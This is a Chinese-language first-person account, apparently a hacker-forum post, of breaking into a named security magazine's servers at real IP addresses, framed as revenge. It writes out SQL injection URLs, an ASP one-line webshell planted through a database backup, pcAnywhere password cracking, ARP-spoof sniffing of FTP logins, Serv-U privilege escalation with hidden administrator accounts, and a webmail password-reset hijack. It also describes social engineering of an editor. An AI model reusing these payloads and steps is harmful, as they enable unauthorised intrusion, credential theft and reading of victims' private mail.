駭客防線——主機外部的危險

前言:不是我有意想搞你，而是你們有些過分了，拿著別人的稿子去賣錢，拿著別人的技術裝點自己，這也無所謂。你們那種優越感讓我不得不提醒你們一下，你們的優越是建立在別人付出之上的。
一、掃描，發現開著ftp。。。。。沒常見漏洞。。。。。決定arp欺騙，進行嗅探。

 

二、找嗅探主機:
C:/>ping hacker.com.cn
Pinging hacker.com.cn [211.157.102.239] with 32 bytes of data:
開始掃描 211.157.102.1-211.157.102.255 80+1433 連接埠,找到一個預設目錄的站，然後找注入漏洞。
http://xx.xx.xx.xx/111.asp?id=3400 and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))
發現不是sa許可權:

http://xx.xx.xx.xx/111.asp?id=3400 and 1=(select name from master.dbo.sysdatabases where dbid=7)
得到庫名ku1:

來吧，想辦法搞個shell(此處黑夜兄弟和臭要飯的兄弟提供了資料)，不理解的，多看看網上資料：
http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[xiaolu] ([xiaoxue][char](255));--
http://xx.xx.xx.xx/111.asp?id=3400;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/ControlSet001/Services/W3SVC/Parameters/Virtual Roots', '/', @result output insert into xiaolu (xiaoxue) values(@result);--
http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 xiaoxue from xiaolu)=1
得到了web路徑d:/xxxx,接下來：
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--
http://xx.xx.xx.xx/111.asp?id=3400;insert into cmd(str) values ('<%if request("a")<>"" then execute request("a")%>');--
http://xx.xx.xx.xx/111.asp?id=3400;backup database ku1 to disk='D:/xxxx/l.asp';--
(關於這種shell的利用,請參見最小的asp後門的動畫http://666w.cn/down/view.asp?id=754)
上傳..............shell,準備提升許可權......,發現pcanywhere,找到：
C:/documents and Settings/All Users/Application Data/Symantec/pcAnywhere/PCA.xxx.CIF
流光破解密碼，pcanywhere串連，看來上天比較協助我，一切順利，admin密碼和pcanywhere密碼一樣，：）,tracert 一下：
1 <10 ms <10 ms <10 ms 211.157.102.239
唉，該當黑防有此劫，可以進行arp欺騙。（關於arp欺騙，參見我在2003-3月寫的一個文章http://bbs.666w.cn/dispbbs.asp?boardID=7&ID=764&page=1）
用webshell上傳我們需要的軟體：
WinPcap.exe arpsniffer.exe pv.exe
arpsniffer.exe ------------ 57 k 榕哥的交換環境下嗅探工具
pv.exe ----------------60k (PrcView附帶的一個命令列程式,華軍有下)殺進程
WinPcap.exe ------------------678k 嗅探所用到的一個驅動程式
安裝WinPcap.exe,下一步，下一步，完成。
建立一個隱藏的虛擬目錄(怎麼建立自己去查資料)， 應用程式保護設為低 以便於我們用webshell運行arp程式，不然被管理員發現可就不好。

三、開始嗅探：
OK，繼續........開始SNIFFER........由於目前中國網路結構和相關技術人員素質等問題.這個可以說是百發百中，運行：
arpsniffer.exe 211.157.102.254 211.157.102.239 21 c:/111.txt 1
211.157.102.254是網關，211.157.102.239是黑防ip,c:/111.txt是log檔案,1是網卡id
接下來要做什麼?當然就是等了.......不過我們不想等幾天時間.我們希望能再順利些.告訴黑夜兄弟行動起來，（嘿嘿），獨行者在QQ上（黑防很掉一個編輯），

黑夜:
"黑防被黑啦.聽說有人上去了.......快看看吧..."
獨行者:
好好，我這就去看
此處省略。。。。。

哈哈.........結果不用說了.幾分鐘後我們看到log檔案明顯增大，因為arpsniffer進程在運行我們沒法直接看，於是用webshell運行：
pv -k -f arpsniffer.exe
kill這個進程，看密碼嘍~~~~~~

四、工作中：
丫丫丫,是這個的ftp呀，http://978229.hacker.com.cn/，上傳shell,呀！沒做安全盤全部可以瀏覽，呀，呀，呀 小鴨子呀，原來你在e:/wwwroot呀，哈哈。
提升全限,serv-u提升許可權，呀怎麼不能運行程式呀，呀，原來cmd.exe改成king.exe了呀，net.exe改成了net1king.exe呀，繼續 fpipe -v -l 3041 -r 43958 127.0.0.1
添加ftp使用者,設為管理員，登陸運行

quote site exec net1king xiaolu xiaoxue /add
quote site exec net1king localgroup administrators xiaolu /add

3389登陸，呀，不行呀，繼續

quote site exec net1king xiaolu xiaoxue@@!#!@#@!!@#@123 /add
quote site exec net1king localgroup administrators xiaolu /add

哈哈，還作了密碼限制，進去了。接下來我就不說了，讓黑防編輯頭疼去吧。。。。。。。。（此處省略N多內容）

看看有什麼好東西吧，發現有webeasymail伺服器哦.看信，看看讓編輯們牛比的了不得的資料，不知道密碼怎麼看呀。

嘿嘿，跟我來：D:/mail/mail/，每個使用者目錄下都有UserWeb.ini
開啟，修改
questionInfo = 1
answerInfo = 1
hintInfo = 1

開啟http://hacker.com.cn/mail---忘記密碼，添上我們的問題和答案，挖靠，這麼多信，有沒有沒什麼好東西啊

該撤退了，剩下的留給編輯們去搞吧。
五：總結：
本次入侵曆時1個小時左右，沒有什麼高深的技術，都是些比較淺顯的技術，嗅探滲透是好幾年前的技術了，sql注入是比較流行的方法，也不算新了，能這麼快得到ftp密碼多虧了黑夜"社交工程學"的運用。
技術雖然很值錢，靈活運用會使技術更有價值。